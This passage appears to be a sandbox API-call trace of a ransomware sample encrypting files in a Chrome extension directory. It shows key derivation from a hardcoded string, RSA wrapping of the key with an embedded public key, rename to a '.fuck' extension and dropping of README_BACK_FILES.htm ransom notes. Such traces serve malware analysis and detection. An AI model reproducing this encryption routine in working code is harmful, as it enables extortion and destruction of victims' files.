dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0252.510] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.511] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0252.512] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0252.515] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0252.515] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0252.515] CryptHashData (hHash=0x29846a0, pbData=0x28cb3c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.515] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2983fe0) returned 1 [0252.515] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.515] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0252.515] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x298cf00) returned 1 [0252.516] CryptImportPublicKeyInfo (in: hCryptProv=0x298cf00, dwCertEncodingType=0x1, pInfo=0x29937b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29937e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29937e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984920) returned 1 [0252.516] CryptEncrypt (in: hKey=0x2984920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0252.516] CryptEncrypt (in: hKey=0x2984920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298ca38*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x298ca38*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0252.516] WriteFile (in: hFile=0x5d64, lpBuffer=0x298ca38*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x298ca38*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0252.518] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0252.519] CryptEncrypt (in: hKey=0x2983fe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0252.519] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0252.519] CloseHandle (hObject=0x5d5c) returned 1 [0252.520] CloseHandle (hObject=0x5d64) returned 1 [0252.520] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\messages.json"), bFailIfExists=0) returned 1 [0252.524] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json", dwFileAttributes=0x0) returned 1 [0252.525] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\messages.json.gsg")) returned 1 [0252.534] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\messages.json.fuck")) returned 1 [0252.536] CryptDestroyHash (hHash=0x29846a0) returned 1 [0252.536] CryptDestroyKey (hKey=0x2983fe0) returned 1 [0252.536] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0252.536] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0252.536] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0252.536] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\readme_back_files.htm")) returned 0xffffffff [0252.536] AreFileApisANSI () returned 1 [0252.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 158 [0252.536] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.537] GetFileType (hFile=0x5d60) returned 0x1 [0252.537] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0252.538] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0 [0252.539] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0252.539] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\readme_back_files.htm")) returned 0xffffffff [0252.539] AreFileApisANSI () returned 1 [0252.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 152 [0252.539] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d268, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0252.540] GetFileType (hFile=0x5d50) returned 0x1 [0252.541] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9beb4*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9beac, lpOverlapped=0x0 | out: lpBuffer=0x2b9beb4*, lpNumberOfBytesWritten=0x2b9beac*=0x5ec, lpOverlapped=0x0) returned 1 [0252.551] FindNextFileA (in: hFindFile=0x2985f20, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0252.551] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\*.*", lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0x2985a20 [0252.551] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.551] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0252.551] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0252.551] GetLastError () returned 0x0 [0252.552] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json")) returned 0x20 [0252.553] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json", dwFileAttributes=0x80) returned 1 [0252.553] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0252.554] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0252.556] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_metadata\\verified_contents.json.gsg", dwFileAttributes=0x2) returned 1 [0252.556] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x298a040) returned 1 [0252.559] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0252.559] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0252.559] CryptHashData (hHash=0x2985ba0, pbData=0x28cb710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0252.559] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x2985ba0, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2984760) returned 1 [0252.560] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----d", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bffc, pcbBinary=0x2b9bfdc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0252.560] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bffc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8 | out: pvStructInfo=0x2b9bfd0, pcbStructInfo=0x2b9bfd8) returned 1 [0252.560] CryptAcquireContextA (in: phProv=0x2b9bfec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bfec*=0x298d098) returned 1 [0252.560] CryptImportPublicKeyInfo (in: hCryptProv=0x298d098, dwCertEncodingType=0x1, pInfo=0x2993a20*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2993a50*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2993a58*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bfe4 | out: phKey=0x2b9bfe4*=0x2983fe0) returned 1 [0252.560] CryptEncrypt (in: hKey=0x2983fe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bfd4*=0x80) returned 1 [0252.561] CryptEncrypt (in: hKey=0x2983fe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x298cce0*, pdwDataLen=0x2b9bfe8*=0x18, dwBufLen=0x80 | out: pbData=0x298cce0*, pdwDataLen=0x2b9bfe8*=0x80) returned 1 [0252.561] WriteFile (in: hFile=0x5d64, lpBuffer=0x298cce0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x298cce0*, lpNumberOfBytesWritten=0x2b9bff8*=0x80, lpOverlapped=0x0) returned 1 [0252.562] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0252.580] CryptEncrypt (in: hKey=0x2984760, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0252.580] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0252.638] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0252.638] CryptEncrypt (in: hKey=0x2984760, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0252.638] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0252.638] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0252.638] CryptEncrypt (in: hKey=0x2984760, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0252.638] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0252.638] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0252.638] CryptEncrypt (in: hKey=0x2984760, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0252.638] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0252.639] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0252.639] CryptEncrypt (in: hKey=0x2984760, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0252.639] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0252.639] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0252.639] CryptEncrypt (in: hKey=0x2984760, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0252.639] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0252.639] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0252.639] CryptEncrypt (in: hKey=0x2984760, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0252.639] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0252.639] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0252.639] CryptEncrypt (in: hKey=0x2984760, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0252.639] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0252.640] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0252.640] CryptEncrypt (in: hKey=0x2984760, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0252.640] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0252.640] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0252.640] CryptEncrypt (in: hKey=0x2984760, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0252.640] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0252.640] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0252.640] CryptEncrypt (in: hKey=0x2984760, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0252.640] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0252.640] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bff8*=0xe9, lpOverlapped=0x0) returned 1 [0252.640] CryptEncrypt (in: hKey=0x2984760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bff8*=0xe9, dwBufLen=0x400 | 